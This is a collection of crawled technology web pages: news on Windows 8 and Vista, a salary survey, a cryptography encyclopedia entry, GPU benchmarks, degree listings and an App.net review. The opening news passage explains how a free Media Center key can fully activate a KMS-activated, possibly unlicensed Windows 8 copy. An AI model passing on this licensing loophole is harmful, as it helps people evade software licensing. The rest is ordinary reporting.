However, the Windows 8 website has a section where you can request a Windows 8 Media Center Pack license. Media Center is currently being offered as a free upgrade until Jan. 31, 2013. Supply an email address and you’ll be sent a specific product key from Microsoft. If you have a KMS-activated copy of Windows 8, with or without a legitimate license key, then going to the System screen will display a link that reads “Get more features with a new edition of Windows.” If you enter your Media Center key there, the OS will become fully activated. It’s a little surprising that with Microsoft’s complex KMS, this type of thing could slip through the cracks, allowing people to take advantage of the system. It seems most likely that after the uproar in response to Microsoft’s plans to remove Media Center from Windows 8 Pro, the company may have rushed the free upgrade, resulting in a loss for Microsoft and a gain for anyone who takes the time to acquire a free Windows 8 Pro copy. It’s unclear whether or not there’s a patch for this – other than removing the free Media Center download all together. Though ending the free Media Center upgrade would be an easy fix, it wouldn’t be a popular choice among customers who just bought a Windows 8 computers and who want the feature. We’ll have to wait and see how the company responds to this latest hit. Get our Top Stories delivered to your inbox: | 计算机 |
2015-48/3682/en_head.json.gz/5237 | TheMan.com Gets Some Questions Answered
TheMan.com has turned the question and answer section, one of the least productive and most overlooked sections of a Web site, into a forum where it can communicate with customers, build a database of e-mail names and provide special offers.TheMan.com, a retail site for socially active, time-constrained men ages 25 to 44, recently launched its "Man of Style" channel complete with an interactive Q&A section, http://asktheexpert.theman.com/themanofstyle .The section allows consumers to ask experts a variety of questions about dress wear, casual wear and grooming. TheMan's experts quickly respond via e-mail or publish the answers on the site, thus tackling one of the glaring problems with many Q&A sections -- it's difficult to get a decent, timely response to a query.The site is accomplishing this task using technology provided by Broad Daylight Inc., an application service provider that develops content channels to broadcast intelligent questions and answers on the Web.Broad Daylight categorizes the questions and sends them to the appropriate expert. In the meantime, the system is collecting data about what consumers are looking for as well as their e-mail addresses. For example, if a consumer asks what width of tie is currently in vogue and then provides his e-mail address, TheMan can follow up with the answer and an offer for the latest line of Ralph Lauren ties.Hitting consumers who are ripe to buy with the right offer in this manner "is ingenious," said Richard A. Swentek, president of Arlen Communications, a Key Largo, FL-research firm specializing in interactive media. "It's a great mechanism to find out what's in the mind of the consumer and an excellent pre-qualification mechanism to segregate the marketplace for different e-market retailers. In the future you'll find that to be valuable for businesses to survive in e-commerce."Typically, sites post a frequently asked question to deal with consumers' questions in the "least painful way," said Stephen Difranco, vice president of marketing for Broad Daylight, Santa Clara, CA. "Most sites don't realize their Q&A section can be a very effective way to market and promote the personality of the site. This is a chance to grab an e-mail address, answer their question and brand and bond with the visitor."The direct marketing and targeting applications are plentiful, according to Difranco. "They can send a graphic postcard with contextual merchandising or advertising. They can provide the opportunity to click to other parts of the sites. Or they could also include a send-to-a-friend button, and then it becomes a viral experience."Broad Daylight plans to include rich media e-mail applications in the future. Consumers will get the answer to their style question and be able to buy a relevant product without leaving their e-mail box.Broad Daylight has worked with a number of sites including the McCain2000.com site. During the 90 days the site was up, the system served up 300,000 answers to voters' questions. From this, McCain's staff gleaned 5,000 unique e-mail addresses.
5 Marketing Questions About New Gmail Inbox UI Answered
Frederiksen Merger Brings Questions More Than Happily Answered
Smart marketers don't need to target you — you can do it for them
Twitter Tuesday recap: You asked, Epsilon answered
Data-Driven Marketing Gets Dramatics Results
Next Article in Data/Analytics Good Telemarketing Management Still Relies on the Basics Sponsored Links | 计算机 |
2015-48/3682/en_head.json.gz/5715 | Programming SQL Server 2005: Extensive Changes Make an Altogether New SQL Server
Sebastopol, CA--With SQL Server 2005, Microsoft has established its dominance of relational database management system software, says author Bill Hamilton. And, indeed, it comes with a long list of changes designed for increased security, scalability, and power, all of which position it as a complete data package. "I believe that SQL Server 2005, the update to SQL Server 2000, is simply the best and easiest-to-use RDBMS available," says Hamilton, adding that this release is sure to increase adoption: "The extensive new features and functionality in this release make it both a compelling upgrade for SQL Server 2000 and a compelling migration for environments where other RDBMSs are deployed."
Used properly, SQL Server 2005 can help organizations of all sizes meet their data challenges head on. The fresh challenge, however, is to master its many new features, because SQL Server 2005 is an altogether different animal than its predecessor. Hamilton's latest book, Programming SQL Server 2005 (O'Reilly, US $49.99) will make the learning curve a little less arduous for those who are ready to learn to put the new SQL Server through its paces.
Programming SQL Server 2005 is designed for users of all levels; the book requires no previous experience with SQL Server 2000, since SQL Server 2005 differs immensely from its predecessor. The book is an ideal primer for developers with little or no SQL Server experience, and a perfect tool to help seasoned SQL Server developers ramp up to SQL Server 2005 programming models. One of the book's more important features is its in-depth coverage of new programming features for the RDBMS. Topics include: | 计算机 |
2015-48/3682/en_head.json.gz/5736 | Computer Technical Support Specialist
The average Computer Technical Support Specialist in the United States can expect to rake in roughly $48K per year. In the world of Computer Technical Support Specialists, total cash compensation can vary between $30K and $65K. Each package generally includes bonuses and profit sharing proceeds, and in exceptional cases, those amounts can reach heights of $5K and $4K, respectively. Residence and tenure each impact pay for this group, with the former having the largest influence. Work is enjoyable for Computer Technical Support Specialists, who typically claim high levels of job satisfaction. The vast majority of Computer Technical Support Specialists (81 percent) survey respondents are men. Medical benefits are awarded to a large number, and a fair number earn dental coverage. The figures in this overview were provided by individuals who took PayScale's salary questionnaire.
Network Management / Administration
Computer / Network Support Technician
Computer Repair Technician
Help Desk Specialist
Information Technology (IT) Consultant
Support Technician, Information Technology (IT)
Profit Sharing$290.87 - $3,987
Job Description for Computer Technical Support Specialist
A computer technical support specialist is an employee who diagnoses and troubleshoots hardware and software problems for other employees or consumers. Almost any midsized company that relies on computers will typically require tech support specialists to assist employees who operate them, so that business operations maintain peak efficiency. Companies that manufacture or sell software, computers, and/or components will also have technical support specialists. These specialists help customers with installing and operating their computers and software.
Many technical support specialists will work as part of an information technology or information services department in a larger company or organization. These business entities typically may have anywhere from dozens to thousands of employee users handling a variety of functions through computer technology. In this career path, the technical support specialist will typically be required to log tech support calls from employees. He or she will then work with them through a variety of step-by-step procedures to attempt to solve difficulties. If the tech support person is in the same building or campus as the employee, the specialist can make an onsite visit and work to diagnose and repair or replace hardware and software as needed.To work as a computer technical support specialist, a person must typically have a strong educational background in the IT field. While a degree may not be required by some employers, most job candidates will find that the certifications in various computer disciplines do require at least some post-secondary training at a technical school or community college. Computer Technical Support Specialist Tasks
Troubleshoot all information technology issues, including software, hardware, and networking.
Install and update desktops, laptops, PDAs, peripherals, networks, and related software.
Though some Computer Technical Support Specialists move into positions like Information Technology Project Manager (where the average salary is $86K), this progression is not the norm. Career advancement for the typical Computer Technical Support Specialist often leads to becoming a Network System Administrator or a Systems Administrator; median salaries in these positions are $7K higher and $11K higher, respectively.
Technical Support Specialist Job Listings
Survey results imply that Computer Technical Support Specialists deploy a deep pool of skills on the job. Most notably, skills in Cisco Networking, Network Management / Administration, Microsoft Exchange, and Windows NT / 2000 / XP Networking are correlated to pay that is above average, with boosts between 4 percent and 12 percent. At the other end of the pay range are skills like HTML, Linux, and Microsoft Word. For most people, competency in Microsoft Office indicates knowledge of Windows NT / 2000 / XP Networking and Computer Hardware Technician.
Computer Technical Support Specialists with more experience do not necessarily bring home bigger paychecks. In fact, experience in this field tends to impact compensation minimally. The median compensation for relatively untried workers is $39K; in the five-to-10 year group, it's higher at around $45K. After working for 10 to 20 years, Computer Technical Support Specialists make a median salary of $49K. Veterans who have worked for more than two decades do tend to make the most in the end; the median pay for this group is $57K.
For Computer Technical Support Specialists, San Francisco provides a pay rate that is 40 percent greater than the national average. Computer Technical Support Specialists will also find cushy salaries in San Diego (+23 percent), New York (+19 percent), Dallas (+13 percent), and Houston (+9 percent). Those in the field find the lowest salaries in San Antonio, 16 percent below the national average. Not at the bottom but still paying below the median are employers in Seattle and Los Angeles (2 percent lower and 1 percent lower, respectively).
Windows NT / 2000 / XP Networking
Computer Hardware Technician
Internet Information Server (IIS) | 计算机 |
2015-48/3682/en_head.json.gz/6198 | Symmetric-key algorithm
(Redirected from Symmetric key)
Symmetric-key algorithms[1] are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link.[2] This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encryption.[3]
1 Types of symmetric-key algorithms
2 Implementations
3 Cryptographic primitives based on symmetric ciphers
4 Construction of symmetric ciphers
5 Security of symmetric ciphers
6 Key generation
Types of symmetric-key algorithms[edit]
Symmetric-key encryption can use either stream ciphers or block ciphers.[4]
Stream ciphers encrypt the digits (typically bytes) of a message one at a time.
Block ciphers take a number of bits and encrypt them as a single unit, padding the plaintext so that it is a multiple of the block size. Blocks of 64 bits have been commonly used. The Advanced Encryption Standard (AES) algorithm approved by NIST in December 2001 uses 128-bit blocks.
Implementations[edit]
Examples of popular symmetric algorithms include Twofish, Serpent, AES (Rijndael), Blowfish, CAST5, RC4, 3DES, Skipjack, Safer+/++ (Bluetooth), and IDEA.[citation needed]
Cryptographic primitives based on symmetric ciphers[edit]
Symmetric ciphers are commonly used to achieve other cryptographic primitives than just encryption.[citation needed]
Encrypting a message does not guarantee that this message is not changed while encrypted. Hence often a message authentication code is added to a ciphertext to ensure that changes to the ciphertext will be noted by the receiver. Message authentication codes can be constructed from symmetric ciphers (e.g. CBC-MAC).[citation needed]
However, symmetric ciphers cannot be used for non-repudiation purposes except by involving additional parties. See the ISO/IEC 13888-2 standard.[citation needed]
Another application is to build hash functions from block ciphers. See one-way compression function for descriptions of several such methods.[citation needed]
Construction of symmetric ciphers[edit]
Main article: Feistel cipher
Many modern block ciphers are based on a construction proposed by Horst Feistel. Feistel's construction makes it possible to build invertible functions from other functions that are themselves not invertible.[citation needed]
Security of symmetric ciphers[edit]
Symmetric ciphers have historically been susceptible to known-plaintext attacks, chosen-plaintext attacks, differential cryptanalysis and linear cryptanalysis. Careful construction of the functions for each round can greatly reduce the chances of a successful attack.[citation needed]
Key generation[edit]
When used with asymmetric ciphers for key transfer, pseudorandom key generators are nearly always used to generate the symmetric cipher session keys. However, lack of randomness in those generators or in their initialization vectors is disastrous and has led to cryptanalytic breaks in the past. Therefore, it is essential that an implementation uses a source of high entropy for its initialization.[5][6][7] | 计算机 |
2015-48/3682/en_head.json.gz/6601 | Posted by TouchArcade Bot, 05-28-2013
Publisher: Chris Yates
Using a combination of real video footage and graphics, Cause & Effect is unlike any game currently available for iPad, immersing you in a story that plays out like a movie.You play Max Alvarez, a perfectly acceptable upstanding citizen who arrives home after a day at work but soon starts to realise that things aren't quite as routine as normal!Cause & Effect offers you different options throughout the story and the decisions you make will influence how the game ultimately plays out.To add further mystery and longevity to the game, Cause & Effect will be offered as a number of chapters similar to TV episodes and will be released as updates at certain timed intervals.The release of the first chapter is completely free of charge so download it now and dive into the world of Cause & Effect.---------------------------------★ Cause & Effect Trivia ★ Cause & Effect has been developed by just one person, this individual has been responsible for everything in the game, including but not limited to, shooting the video, editing the video, creating the graphics and user interface, sound effects and writing the actual code to piece it altogether. Software and hardware used to develop Cause & Effect includes Final Cut Pro X, Garageband on Mac and iPad, Apple Pages, Audacity, MPEG Streamclip, Xcode, Photoshop, Nikon D7000, MacBook Pro, MacBook Air, iPad. Chapter 1 & 2 have over 35,000 lines of code. All locations in the game are real life environments. Cause & Effect started out as an idea in early 2011. All the programming for Cause & Effect was done sitting in front of a MacBook Pro in a living room into the early hours of many, many mornings! | 计算机 |
2015-48/3682/en_head.json.gz/6602 | About Michael J. Miller
Michael J. Miller is chief information officer at Ziff Brothers Investments, a private investment firm.
Miller, who was editor-in-chief of PC Magazine from 1991 to 2005, authors this blog for PC Magazine to share his thoughts on PC-related products. No investment advice is offered in this blog. All duties are disclaimed. Miller works separately for a private investment firm which may at any time invest in companies whose products are discussed in this blog, and no disclosure of securities transactions will be made.
Read full bio »
Is Windows 8 a Replay of the 1980s?
Nov 26, 2012 3:46 PM EST
By Michael J. Miller
Windows 8 has now been out for about a month now and I've been hearing too many comparisons to Windows Vista. Many people considered Vista a failure because corporations largely didn't upgrade to that version and Apple and others made fun of it. (Never mind that it sold hundreds of millions of copies.)
When I look at Windows 8, though, I am reminded more of Windows in the 1980s. Remember that when Windows first came out in 1985, Apple already was shipping the original Macintosh, with a more modern user interface. The first Windows was quite clunky, with a tiled interface instead of overlapping Windows. Windows 2 got a bit better with overlapping Windows, but it was still mainly an add-on rather than its own operating system. Windows/386 got closer, but it wasn't until Windows 3 came in 1990 that it really became an environment that most people could live in. Even then, I heard a lot of complaining about switching between the graphical user interface and the older command-line experience of DOS. (By the way, my history of Windows was in the November 8, 2005 issue, which is online here.)
In some ways, the parallels between Windows 8 and the first version of Windows are striking. Again, Apple has adopted a new user interface faster; in the 1980s it had the mouse and graphical user interface and now it has touch and sensors. Microsoft's first response offers tiled windows. There are a lot of complaints about switching back and forth between the older way of working and the newer one; then it was between DOS and Windows and now it's between the desktop and the newer Windows 8 UI.
As before, the first version is a bit clunky and needs to evolve. While we're used to Windows and Office releases that are years apart, back then, there was much more rapid change. Windows 2.0 and Windows/386 (with overlapping windows and the ability to run multiple DOS applications) came out in June 1988, Windows 3.0 came out in May 1990, Windows 3.0a (with multimedia features) came out in October 1991, Windows 3.1 came out in April 1992, and Windows for Workgroups (which added networking features) came out in October 1992. With Apple offering new features in its operating systems (both iOS and OS X) every year, Microsoft will need to move much faster than the every-three-years cycle it's been on if it hopes to compete.
But it's not just the OS itself. I'd argue that the bigger problem is the same one that really held back Windows in the 1980s: a lack of compelling applications. For years, the one really compelling Windows application was Excel. It wasn't until good Windows word processors—Microsoft Word for Windows and Samna (later Lotus's) Ami Pro—that there was enough reason for people to consider Windows as a primary working environment. Until the word processors, at best, people used a couple of Windows apps, but spent most of their time in DOS. After those applications started to develop, and Word, Excel, and PowerPoint evolved into Office, other developers followed suit and Windows became the default environment for new applications. It was that which helped make Windows the standard.
That's true of the way I expect most people are using Windows 8. There are a few nice new Windows tiled applications that take advantage of the new touch paradigm, but right now, most of them are more limited than their desktop equivalents. A few desktop applications—Office 2013 and Internet Explorer 10 come to mind first—have had minor adjustments to work better with touch, but it's clear that this wasn't the design goal. Microsoft will need compelling new applications to get people to use the new user interface.
Can this happen? Of course. It took Microsoft 10 years (between the shipment of Windows 1 and Windows 95) to come up with all the pieces it really needed to, but the company kept working on it through the late 80s and early 90s. The competitive environment seems much tougher nowadays, however, with Apple much stronger and Google's Android a new, open competitor. Indeed, Microsoft seems to be fighting on more fronts than ever. But then, at the time, Apple and IBM with OS/2 seemed much stronger competitors to Microsoft than they look in retrospect.
All this isn't to say that the new Windows interface will become as successful as the desktop interface was in the day as there is too much competition to know. Still, it is way too early to write it off.
Microsoft Windows,Windows Vista
Microsoft,Windows Vista,Windows 8 | 计算机 |
2015-48/3682/en_head.json.gz/7699 | Masters in Computer Science
Search 90+ Online Degrees and Programs
Guide to Masters in Computer Science Degrees
While students will focus much of their education on programming languages, computer science also focuses on how computers process and interpret data in addition to creating data structures or models. We have listed just a few of some of the highest-rated online CS programs so use the search widget to the left to find more schools and programs for this degree or other related degrees. Masters in Computer Science
American Sentinel University – One of the leading online technology schools in the nation, American Sentinel’s online Masters in Computer Science is fully accredited and prepares students both technically and by teaching leadership and management skills. This program expands upon your foundation in computer science and teaches more complex principles and strategies. As such, a Bachelor’s Degree is required in order to enroll in this program. MS in Information Systems
MS in IT: Information Security
MS in IT: Software Engineering
Walden University – Walden University is one of the largest providers of online education and takes a practical approach when developing its courses. Its accredited programs offer hands-on exercises that draw students directly into their education and helps students visualize complex concepts. Walden has three Masters in Computers Science degrees available: Software Engineering, Information Security, and Information Systems. MBA in Computer Science
Northcentral University – The MBA in Applied Computer Science program from Northcentral University is a fully online accredited degree designed to incorporate both business management skills and computer science masters level courses in order to create students who are prepared for leadership positions dealing with computers and technology. Moreover, this program can be completed at a pace that is comfortable to you. MS in Computer Science
New Jersey Institute of Technology – NJIT is a leading source for accredited degree programs focused on the computer industry. NJIT teaches practical lessons and relevant techniques that fit in with today's latest technological advances. This helps students obtain an education they can use immediately upon graduation. NJIT has an online program for a Masters of Science in Computer Science degree that can be completed in under two years. MS in Computer Info Systems
MS/CIS – Database Mgmt
MS/CIS – IT Mgmt
MS/CIS – Security
Boston University – The online masters in computer science or computer information science from Boston University are fully accredited online courses by a well-respected national university and allow students to specialize based on their career focus. BU has several Masters of Computer Science degrees available including a MS in Computer Info Systems, MS/CIS in Database Management, MS/CIS in IT Management, and a MS/CIS in Security. PhD in Computer Science
PhD/CompSci – Emerging Media
Colorado Technical University – These online PhD in computer science programs from Colorado Technical University can be completed in 3 years, and prepares students to not only be leaders in the field, but advance the field of computer science. CTU has two accredited Computer Sciece degrees available through online courses at the doctorates level: Computer Science and Emerging Media. Click here for more Computer Science Degree Programs…
What is Computer Science?
Do you enjoy working with computers and learning about new technologies? Are you Internet savvy and have a knack for troubleshooting and diagnosing IT problems? With a degree in computer science, you’ll be able to apply your interests in a number of exciting and rewarding career options. A computer science degree comes with many benefits, including higher starting salaries and advanced levels of responsibility.
Computer science is a highly sought after degree. As technology continues to advance, so does the demand for qualified computer scientists. With a degree in computer science, you’ll be prepared to secure a position as a highly-skilled programmer, Web developer, and other IT-related occupations.
If you’re interested in computers and other forms of technology, pursuing a computer science degree is a good place to start. You can earn an associate, bachelor, master, and even a doctoral degree. Depending on your goals and skill level, going back to school will help you move forward in your career or start a new career path.
Computer science is not just programming. In fact, computer science covers a wide spectrum of areas including web design, graphics, multimedia, software engineering, and many other fields. In short, computer science is a discipline that involves the understanding and design of computers and computational processes. The construction and analysis of algorithms and data structures are fundamental aspects of computer programming and computer science. When you put this all together, computer science is a fast-moving, exciting field with unlimited potential.
And computer science is not just for “techies” or sophisticated computer users. Anyone with an interest in computers and technology can major in this field. As long as you have a passion for the subject and a willingness to learn, computer science will help you achieve your high-tech dreams.
What master degrees are available for computer science careers?The term "computer science" can refer to the specific major or the general field of computer science. The latter can be applied to several jobs within the technology industry, including positions in computer security, server and network management, and software engineering. Fortunately, several degrees are available in these majors, making it easy to further your career in this field:Master's Degrees in Computer ScienceMaster's Degrees in Software EngineeringMaster's Degrees in Computer and Information SecurityMaster's Degrees in Database and Network SystemsMaster's Degrees in Information SystemsMaster's Degrees in IT Management
What to Expect from a Graduate-Level Computer Science Program?
The level of education you wish to pursue will determine the type of coursework you’ll be required to complete. At the graduate level, you’ve already completed your general education requirements as well as most entry-level computer and technology courses. Now you’re ready to take on more advanced courses in your field with the option to specialize in a particular area of study such as:
Computer and Network Security
Robotics and Computer Vision
Mobile and Internet Computing
You’ll acquire a broad range of skills such as:
Expertise in your chosen area of computer science.
Programming and software development skills.
Knowledge of mathematical algorithms.
The ability to recognize and solve computational problems.
Some schools require students to complete an internship in addition to coursework. Internships provide the opportunity to gain experience and develop your talents. If you’re going to school while taking classes full or part-time, you might be able to shadow a co-worker who works in a position of interest. The more opportunities you have to network and connect with others in the field, the better your chances of advancing your career.
Popular Careers for Computer Science Majors
With a master’s degree in computer science, you qualify for a number of career options. Jobs in computer science are expected to grow faster than average for all occupations, according to The Bureau of Labor Statistics. In fact, prospects for qualified computer scientists and programmers should be excellent, especially those with advanced degrees.
Computer science is a growing field with a wide range of career opportunities. Once you have your master’s degree, it’s time to start exploring your options. O*NET OnLine provides comprehensive occupational data that includes a number of in-demand computer science careers including:
Computer and Information Systems Managers: Plan, direct, or coordinate activities in such fields as electronic data processing, information systems, systems analysis, and computer programming.
Database Architects: Design strategies for enterprise database systems and set standards for operations, programming, and security. Design and construct large relational databases. Integrate new systems with existing warehouse structure and refine system performance and functionality.
Web Administrators: Manage web environment design, deployment, development and maintenance activities. Perform testing and quality assurance of web sites and web applications.
Engineers: Design and develop solutions to complex applications problems, system administration issues, or network concerns. Perform systems management and integration functions.
Software Developers: Research, design, develop, and test operating systems-level software, compilers, and network distribution software for medical, industrial, military, communications, aerospace, business, scientific, and general computing applications.
Video Game Designers: Design core features of video games. Specify innovative game and role-play mechanics, story lines, and character biographies. Create and maintain design documentation. Guide and collaborate with production staff to produce games as designed.
Online Computer Science Programs – How Do They Work?
If you’re certain that a graduate degree in computer science is your ticket to a more rewarding career, it’s time to consider what and where you want to study.
Online computer science programs for graduate students are designed for individuals who want to continue working while getting their degree. By taking classes online, you can finish your degree at your own pace when it’s convenient for you. Many accredited schools now offer online computer science programs that meet the highest standards of educational excellence. Before you apply to an online computer science program, make sure the school is accredited and courses offered are transferable to other colleges and universities.
With a graduate degree in computer science, you have a broad range of opportunities ahead of you. Computer science is an exciting field with tremendous potential. You can work in government, the non-profit sector, education, and many other types of businesses. Take this opportunity to develop new skills, improve existing ones, and advance your career.
Search Online Degrees
Technology (All)
Engineering Technologies
Game Software Development
- Select All Degrees - Associate's
Campus & Online Campus Online Search Online Degrees
Campus & Online Campus Online Related Degree Programs
Masters in Computer Science Masters in Computer Engineering Masters in Computer Security Masters in Databases Masters in Media Design Masters in Info Systems Masters in IT Masters in Networks Masters in Programming Masters in Software Engineering Masters in Technology Mgmt Student Library
Career Opportunities With a Computer Science Degree
What is the Average Salary With a Computer Science Degree?
Latest Blog Updates
20 Best Google Chrome Extensions for Computer Nerds25 Useful Q&A and Tutorial Sites for Computer Programmers33 Interesting and Unique Careers in the Computer Science FieldTop 20 iPad Apps for WordPress DevelopersThe Top 50 Computer Science Bloggers
Copyright 2015 Masters in Computer Science | 计算机 |
2015-48/3682/en_head.json.gz/8072 | Call of Duty: Black Ops GPU & CPU Performance In-depth
on November 16, 2010 Most Popular
Black Ops Screenshot Gallery
Testing Methodology
1680x1050 - Gaming Performance
CPU Scaling - Core i7 9xx
What Works and What Doesn't?
At 1680x1050 we found that the Radeon HD 5770 was able to average 61fps with a minimum of 41fps, which we considered playable. Below that there were half a dozen slower graphics cards - the GeForce GTS 450, for example, delivered playable frame rates but sudden drops in performance were occasionally noticeable.
Surprisingly, the old Radeon HD 4890 performed poorly. Averaging just 50fps, it was 2fps faster than the Radeon HD 4850 but both cards occasionally dropped to just 30fps and the lag was quite noticeable. The GeForce 9800 GT averaged 42fps and really struggled with intense scenes, while the current-gen Radeon HD 5670 was as always a disappointment.
Looking beyond the Radeon HD 5770 it was all smooth sailing. The old GeForce GTX 260 managed an average of 70fps and a minimum of 52fps, while the GeForce GTX 275 was significantly faster with an average of 84fps. The Radeon HD 5850 also performed well averaging 89fps, though it occasionally dipped down to a minimum of just 52fps.
At the top of the scale we have the brand new GeForce GTX 580 with an average of 123fps, where we suspect at this resolution it found the limits of our overclocked Core i7 processor. The GeForce GTX 480 was on average just 2fps slower, though the minimum recorded frame rate was 17fps slower. The dual-GPU Radeon HD 5970 is rarely seen performing well at lower resolutions but with an average of 117fps we have nothing to complain about this time. | 计算机 |
2015-48/3682/en_head.json.gz/8496 | Salesforce May Go Shopping in Response to Oracle Deal
It isn’t too much of a leap to suspect that other companies besides Oracle gave some thought to acquiring Eloqua. The marketing software concern for which the software giant will pay $871 million might have also made a logical fit at Salesforce.com, though Salesforce might have had to take on some debt to pay that price.
Anyway, there’s speculation that today’s deal for Eloqua may amount to a starting gun for a new round of acquisitions in the cloud software space. In a note to clients today, Karl Keirstead, an analyst with BMO Capital Markets, argues that Salesforce may answer Oracle with some acquisitions of its own.
“In our view, the deal is a modest net negative for Salesforce.com, making it incrementally tougher for them to pick off Oracle’s Siebel client base,” Keirstead wrote this morning. He also believes that about 50 percent or more of Eloqua’s customers are also Salesforce.com customers.
That might spur Salesforce into action on the acquisition front, he says. Having already made significant acquisitions of Radian6 and Buddy Media in the last two years, Salesforce might move on two privately held cloud-based companies in the marketing field.
One is Marketo, a fast-moving company that specializes in revenue performance management. It raised $50 million in a Series F round led by Battery Ventures last year, bringing its total capital raised to $108 million. Its other investors include Institutional Venture Partners, InterWest Partners, Mayfield Fund and Storm Ventures.
Another possible target for Salesforce, Keirstead argues, is HubSpot, a social media marketing outfit based in Cambridge, Mass. It raised $35 million in a fifth round of funding last month. The round brought its total capital raised to about $101 million, and Salesforce had invested in earlier rounds. Its other investors include Google Ventures, Sequoia Capital, General Catalyst Partners, Matrix Partners, Altimeter Capital and Cross Creek Capital.
The point, Keirstead says, is that Salesforce will seek to build its own “marketing cloud” offering. Of course, Salesforce doesn’t have the financial flexibility that Oracle does. It has only $1.4 billion in combined cash and short- and long-term investments as of the close of its most recent quarter. That’s almost pocket change compared to Oracle’s $34 billion as of the quarter reported earlier this week.
Tagged with: Altimeter Capital, Battery Ventures, BMO Capital, Buddy Media, Cross Creek Capital, Eloqua, General Catalyst Partners, Google Ventures, HubSpot, Institutional Venture Partners, InterWest Partners, Karl Keirstead, Larry Ellison, M&A, Marc Benioff, Marketo, Matrix Partners, Mayfield Fund, mergers and acquisitions, Oracle, Radian6, Salesforce, Salesforce.com, Sequoia Capital, Storm Ventures | 计算机 |
2015-48/3682/en_head.json.gz/8789 | Karen Morton
Meanderings of one who is lucky enough to have her avocation be her vocation.
2000 columns
How many columns does the largest table you've ever worked with contain? The current project I'm working on has 1 table with almost 2000 columns (and it's likely to add more!). This is the most highly denormalized design I've ever encountered and there's something about it that makes the performance optimizer in me cringe. But, the statisticians that have to munch and crunch this data in SAS tell me this format best suits their needs (based on similar designs used successfully in previous projects).I think I'm really more concerned about the work that has to be done to populate these columns as most of the columns contain aggregations or formulations of some sort or another. So, perhaps it's not the number of columns that really is niggling at me as it is everything that must occur to produce the values contained in a single row (it's a lot).What's your experience? Did the number of columns help, hinder or make no difference in the design and performance of the application that used such wide tables? This phase of the pro | 计算机 |
2015-48/3682/en_head.json.gz/9396 | U.S. Army Says No to Windows 7, Yes to Vista Upgrade
99 comment(s) - last by Dfere.. on May 29 at 8:50 AM
The Army has decided to upgrade all of its computers, like those shown here (at the NCO Academy's Warrior Leaders Course) to Windows Vista. It says the adoption will increase its security and improve standardization. It also plans to upgrade from Office 2003 to Office 2007. As many soldiers have never used Vista or Office '07, it will be providing special training to bring them up to speed. (Source: U.S. Army)
Army will upgrade all its computers to Vista by December
For those critics who bill Microsoft's Windows Vista a commercial failure for failing to surpass Windows XP in sales, and inability to capitalize in the netbook market, perhaps they should reserve judgment a bit longer. Just as Windows 7 hype is reaching full swing in preparation for a October release, the U.S. Army announced that like many large organizations, it will wait on upgrading to Windows 7. However, unlike some, it is planning a major upgrade -- to Windows Vista.
The U.S. Army currently has 744,000 desktop computers, most of which run Windows XP. Currently only 13 percent of the computers have upgraded to Windows Vista, according Dr. Army Harding, director of Enterprise Information Technology Services. It announced in a press release that it will be upgrading all of the remaining systems to Windows Vista by December 31st. The upgrade was mandated by a Fragmentary Order published Nov. 22, 2008.
In addition to Windows Vista, the Army's version of Microsoft's Office will also be upgraded. As with Windows, the Army is forgoing the upcoming new version -- Office 2010 -- in favor to an upgrade to Office 2007. Currently about half of the Army's computers run Office 2003 and half run Office 2007.
The upgrade will affect both classified and unclassified networks. Only standalone weapons systems (such as those used by nuclear depots) will remain unchanged. Dr. Harding states, "It's for all desktop computers on the SIPR and NIPRNET."
Army officials cite the need to bolster Internet security and standardize its information systems as key factors in selecting a Windows Vista upgrade. Likewise, they believe that an upgrade to Office 2007 will bring better document security, and easier interfacing to other programs, despite the steeper learning curve associate with the program (which is partially due to the new interface, according to reviewers).
Sharon Reed, chief of IT at the Soldier Support Institute, says the Army will provide resources to help soldiers learn the ropes of Windows Vista. She states, "During this process, we are offering several in-house training sessions, helpful quick-tip handouts and free Army online training."
The U.S. Army will perhaps be the largest deployment of Windows Vista in the U.S. Most large corporations keep quiet about how many Windows Vista systems versus Windows XP systems they've deployed. However, past surveys and reports indicate that most major businesses have declined to fully adopt Windows Vista. Likewise, U.S. public schools and other large government organizations have only, at best, partially adopted of Vista.
RE: big security hole
DOOA
Big security hole(s)As long as IT departments want the ease of support Microsoft will have security holes; remote assistance, remote desktop, scripted registry edits, automatic updates, etc. are all for ease of support. They also make an OS more vulnerable.Check out QNX and why it is a secure OS. The QNX systems I set up have lasted longer than the hardware they run on and require no updates. Granted they don't have all the bells and whistles, but that is the trade off.As for missing the pointI have seen no posts recognizing Microsoft's misguided UI changes.Why is there such a big learning curve from Office 2003 to 2007? Because the new features were not an upgrade, they were the focal point. This is a bad idea in an office environment; let people continue with the old menus unchanged and add the features to them. I hate seeing the productivity loss in my employees as they train and discuss how to do things in Office 2007 they have already been doing for four years with Office 2003. Parent
Master Kenobi
quote: I hate seeing the productivity loss in my employees as they train and discuss how to do things in Office 2007 they have already been doing for four years with Office 2003. There's a difference between knowing how to do something and memorizing a series of clicks. Your employees are exhibiting the latter if they couldn't figure it out on the new system in 24 hours. Parent
Windows 7 to Offer Better Hyper-Threading Support
Study: 83 % of Businesses Won't Deploy Windows 7 Next Year
Companies Adopt "Just Say No" Policy On Vista, Wait For Windows 7
Vista Fails to Improve on Windows XP's Opening Act | 计算机 |
2015-48/3682/en_head.json.gz/9431 | Posted Hands on with App.net, the pay-for Twitter disruption platform By
The Dalton Caldwell blog post-inspired App.net has been hatching plans to take on Twitter with its pay-for model for weeks now. At last report, the platform was well short of its $500k goal, but over the last week, the hype and interest was enough to tip App.net over the edge ahead of its deadline.
“Thank you for believing,” Caldwell wrote on Saturday. “I know in my heart that what made join.app.net succeed was your willingness and openness to give App.net the benefit of the doubt, to read our github documentation, to ask to participate in the alpha, to write blogposts in our support. Thank you.”
Now, the alpha version is up and running.
App.net’s interface is, to summarize, bare bones. You have a mere four landing pages you can check out: Your personal stream (posts from those you’re following), your posts, mentions, and the global feed. It’s certainly more sparse than Twitter, both in what and how you navigate, and its looks. While you have a Facebook-like profile page complete with a personal picture and cover photo, the rest of the site is quite stark.
And front and center, in big, bold, plain type, is a export tool for grabbing all of your App.net-posted data.
There’s a lot of work to be done, clearly, so plenty is going to fall onto the “what’s missing” list, but that’s to be expected. That said, let’s dive in.
